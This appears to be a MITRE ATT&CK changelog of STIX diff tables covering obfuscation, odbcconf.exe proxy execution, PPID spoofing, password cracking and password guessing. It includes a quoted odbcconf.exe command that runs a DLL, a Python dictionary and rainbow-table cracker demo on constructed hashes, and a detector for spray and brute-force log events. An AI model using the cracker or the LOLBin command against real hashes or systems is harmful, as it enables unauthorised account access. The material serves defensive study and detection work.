| description | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.<br>This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) |
| external_references[1]['source_name'] | capec | Volexity PowerDuke November 2016 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/267.html | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ |
| external_references[2]['source_name'] | Volexity PowerDuke November 2016 | GitHub Revoke-Obfuscation |
| external_references[2]['description'] | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. | Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018. |
| external_references[2]['url'] | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ | https://github.com/danielbohannon/Revoke-Obfuscation |
| external_references[3]['source_name'] | Linux/Cdorked.A We Live Security Analysis | FireEye Obfuscation June 2017 |
| external_references[3]['description'] | Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017. | Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018. |
| external_references[3]['url'] | https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/ | https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html |
| external_references[4]['source_name'] | Carbon Black Obfuscation Sept 2016 | FireEye Revoke-Obfuscation July 2017 |
| external_references[4]['description'] | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018. |
| external_references[4]['url'] | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ | https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf |
| external_references[5]['source_name'] | FireEye Obfuscation June 2017 | GitHub Office-Crackros Aug 2016 |
| external_references[5]['description'] | Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018. | Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html | https://github.com/itsreallynick/office-crackros |
| external_references[6]['source_name'] | FireEye Revoke-Obfuscation July 2017 | Linux/Cdorked.A We Live Security Analysis |
| external_references[6]['description'] | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018. | Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017. |
| external_references[6]['url'] | https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf | https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/ |
| external_references[7]['source_name'] | PaloAlto EncodedCommand March 2017 | Carbon Black Obfuscation Sept 2016 |
| external_references[7]['description'] | White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018. | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. |
| external_references[7]['url'] | https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ |
| external_references[8]['source_name'] | GitHub Revoke-Obfuscation | PaloAlto EncodedCommand March 2017 |
| external_references[8]['description'] | Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018. | White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018. |
| external_references[8]['url'] | https://github.com/danielbohannon/Revoke-Obfuscation | https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ |
| external_references[9]['source_name'] | GitHub Office-Crackros Aug 2016 | capec |
| external_references[9]['url'] | https://github.com/itsreallynick/office-crackros | https://capec.mitre.org/data/definitions/267.html |
| x_mitre_data_sources[0] | Command: Command Execution | Process: OS API Execution |
| x_mitre_data_sources[1] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | Process: Process Creation | Module: Module Load |
| x_mitre_defense_bypassed[0] | Host forensic analysis | Host Forensic Analysis |
| x_mitre_defense_bypassed[1] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[2] | Host intrusion prevention systems | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[3] | Application control | Application Control |
| x_mitre_defense_bypassed[4] | Log analysis | Log Analysis |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | File: File Metadata | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control by file name or path | |
| Old Description | New Description |
|---|---|
| Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft. Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) | Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.<br>Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:39:00.717000+00:00 | 2022-03-11 18:52:49.877000+00:00 |
| description | Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.<br>Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) | Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.<br>Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)<br>Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)<br>Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 14:11:20.296000+00:00 | 2022-05-03 02:15:42.360000+00:00 |
| external_references[1]['source_name'] | DidierStevens SelectMyParent Nov 2009 | XPNSec PPID Nov 2017 |
| external_references[1]['description'] | Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019. | Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019. |
| external_references[1]['url'] | https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ | https://blog.xpnsec.com/becoming-system/ |
| external_references[2]['source_name'] | Microsoft UAC Nov 2018 | CounterCept PPID Spoofing Dec 2018 |
| external_references[2]['description'] | Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019. | Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019. |
| external_references[2]['url'] | https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works | https://www.countercept.com/blog/detecting-parent-pid-spoofing/ |
| external_references[3]['source_name'] | CounterCept PPID Spoofing Dec 2018 | Microsoft UAC Nov 2018 |
| external_references[3]['description'] | Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019. | Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019. |
| external_references[3]['url'] | https://www.countercept.com/blog/detecting-parent-pid-spoofing/ | https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works |
| external_references[4]['source_name'] | CTD PPID Spoofing Macro Mar 2019 | Microsoft Process Creation Flags May 2018 |
| external_references[4]['description'] | Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019. | Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019. |
| external_references[4]['url'] | https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ | https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags |
| external_references[5]['source_name'] | XPNSec PPID Nov 2017 | Secuirtyinbits Ataware3 May 2019 |
| external_references[5]['description'] | Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019. | Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019. |
| external_references[5]['url'] | https://blog.xpnsec.com/becoming-system/ | https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 |
| external_references[6]['source_name'] | Microsoft Process Creation Flags May 2018 | DidierStevens SelectMyParent Nov 2009 |
| external_references[6]['description'] | Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019. | Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019. |
| external_references[6]['url'] | https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags | https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ |
| external_references[7]['source_name'] | Secuirtyinbits Ataware3 May 2019 | CTD PPID Spoofing Macro Mar 2019 |
| external_references[7]['description'] | Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019. | Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019. |
| external_references[7]['url'] | https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 | https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ |
| x_mitre_data_sources[1] | Process: Process Creation | Process: Process Metadata |
| x_mitre_data_sources[2] | Process: Process Metadata | Process: Process Creation |
| x_mitre_defense_bypassed[1] | Host forensic analysis | Host Forensic Analysis |
| Old Description | New Description |
|---|---|
| Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. | Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. |
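The description above distinguishes between cracking with a pre-computed table and systematically guessing, and notes that the work happens on adversary-controlled systems. The following is an added example, not part of the ATT&CK description or this changelog, showing why that distinction matters: an unsalted single-round digest falls to a table built once and reused against every dump, while a salted, iterated hash forces a full KDF computation per guess and makes any table useless. The wordlist, the "dumped" hashes and the salt are constructed for the example.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# Constructed wordlist; a real run would read a dictionary file such as rockyou.txt.
WORDLIST = ["password", "letmein", "Summer2020", "Welcome1", "qwerty", "P@ssw0rd"]


def unsalted_sha1(password: str) -> str:
    """Unsalted, single-round digest: the case a precomputed table defeats."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def build_lookup_table(words: Iterable[str]) -> Dict[str, str]:
    """Precompute digest -> plaintext once. The table is reusable against any
    dump of unsalted hashes, which is the economic point of rainbow tables."""
    return {unsalted_sha1(w): w for w in words}


def crack_with_table(dumped: Iterable[str], table: Dict[str, str]) -> Dict[str, Optional[str]]:
    """O(1) lookup per hash; None means the plaintext was not in the table."""
    return {h: table.get(h.lower()) for h in dumped}


def salted_pbkdf2(password: str, salt: bytes, iterations: int) -> str:
    """Salted and iterated: every guess costs `iterations` HMAC rounds, and the
    per-account salt means no table computed in advance applies."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations).hex()


def crack_salted(stored: str, salt: bytes, iterations: int, words: Iterable[str]) -> Optional[str]:
    """Dictionary attack that must recompute the KDF per candidate."""
    for w in words:
        if hmac.compare_digest(salted_pbkdf2(w, salt, iterations), stored):
            return w
    return None


def demo():
    table = build_lookup_table(WORDLIST)
    # Constructed "dump": one password from the wordlist, one that is not.
    dumped = [unsalted_sha1("Summer2020"), unsalted_sha1("Tr0ub4dor&3")]
    unsalted_results = crack_with_table(dumped, table)

    salt = bytes.fromhex("a1b2c3d4e5f60718")  # constructed per-account salt
    iterations = 10_000
    stored = salted_pbkdf2("Welcome1", salt, iterations)
    table_hit = table.get(stored)                                # the table knows nothing about it
    salted_result = crack_salted(stored, salt, iterations, WORDLIST)  # so each guess is paid for
    return unsalted_results, table_hit, salted_result


if __name__ == "__main__":
    print(demo())
```

Only the first dumped hash is recovered from the table; the salted hash is recovered too, but only by running the KDF over the whole wordlist, which is the cost that long, random passwords and high iteration counts are meant to inflate.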
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Mohamed Kmal'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-55 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 15:39:59.041000+00:00 | 2022-04-19 21:33:46.023000+00:00 |
| description | Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. | Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. |
| external_references[1]['source_name'] | capec | US-CERT-TA18-106A |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/55.html | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/55.html', 'external_id': 'CAPEC-55'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) * SNMP (161/UDP and 162/TCP/UDP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. |
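The description above makes two detection-relevant points: guessing is risky for the adversary because it produces authentication failures and lockouts, and Kerberos attempts do not produce the 4625 "logon failure" event that SMB/NTLM attempts do. The following is an added example, not part of the ATT&CK description or this changelog, that runs a simple classifier over constructed Windows Security events: it folds 4625 and Kerberos pre-authentication failures (4771, whose client address carries an IPv4-mapped `::ffff:` prefix) into one view per source, and separates a single-account brute force, which a lockout policy will also catch, from a password spray that stays under the lockout threshold on every account and is invisible to threshold-only alerting. The events, addresses and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple


def _ev(event_id: int, ts: str, user: str, ip: str) -> dict:
    return {"EventID": event_id, "TimeCreated": ts, "TargetUserName": user, "IpAddress": ip}


# Constructed events shaped like Windows Security log fields. 4625 is the
# "logon failure" written for NTLM/interactive attempts; a Kerberos
# pre-authentication failure is logged on the DC as 4771 instead, with an
# IPv4-mapped IPv6 client address, so a rule keyed on 4625 alone misses it.
SAMPLE_EVENTS: List[dict] = []
# Benign: one user mistypes twice from her own workstation.
SAMPLE_EVENTS += [_ev(4625, "2022-10-01T09:00:01", "alice", "10.0.0.5"),
                  _ev(4625, "2022-10-01T09:00:09", "alice", "10.0.0.5")]
# Brute force: eight guesses at one service account (locks it out at a threshold of 6).
SAMPLE_EVENTS += [_ev(4625, f"2022-10-01T09:01:{s:02d}", "svc_backup", "198.51.100.9")
                  for s in range(0, 40, 5)]
# Spray: twelve accounts, two guesses each (one NTLM, one Kerberos), under any sane lockout threshold.
for n in range(12):
    SAMPLE_EVENTS.append(_ev(4625, f"2022-10-01T09:02:{2 * n:02d}", f"user{n:02d}", "203.0.113.7"))
    SAMPLE_EVENTS.append(_ev(4771, f"2022-10-01T09:03:{2 * n:02d}", f"user{n:02d}", "::ffff:203.0.113.7"))


def normalize_ip(ip: str) -> str:
    """Fold the ::ffff: prefix 4771 uses so both event types bucket together."""
    return ip[len("::ffff:"):] if ip.startswith("::ffff:") else ip


def analyse(events: Iterable[dict], window: timedelta = timedelta(minutes=10),
            lockout_threshold: int = 6, spray_min_accounts: int = 10) -> List[dict]:
    """Count failures per (source, time bucket, account) and classify each source:
    one account at or above the lockout threshold is a brute force; many accounts
    each below it is a spray, which a lockout policy alone never surfaces."""
    bucket_secs = int(window.total_seconds())
    counts: Dict[Tuple[str, int], Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for e in events:
        if e["EventID"] not in (4625, 4771):
            continue
        t = datetime.fromisoformat(e["TimeCreated"])
        epoch = int((t - datetime(1970, 1, 1)).total_seconds())
        # Fixed-size buckets keep this simple; a burst straddling a boundary is split.
        key = (normalize_ip(e["IpAddress"]), epoch // bucket_secs)
        counts[key][e["TargetUserName"].lower()] += 1

    findings = []
    for (source, _), per_account in counts.items():
        worst = max(per_account.values())
        if worst >= lockout_threshold:
            kind = "brute_force"
        elif len(per_account) >= spray_min_accounts:
            kind = "password_spray"
        else:
            continue
        findings.append({"source": source, "kind": kind,
                         "accounts": len(per_account), "max_per_account": worst})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f)
```

The spray source never exceeds two failures per account, so nothing locks out and a per-account rule stays silent; only counting distinct accounts per source surfaces it. Tune `spray_min_accounts` and the window to the environment, and remember that the Kerberos failures are on the domain controllers, not on the targeted member server.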
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-49 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-21 16:41:35.269000+00:00 | 2022-07-22 18:37:22.173000+00:00 |
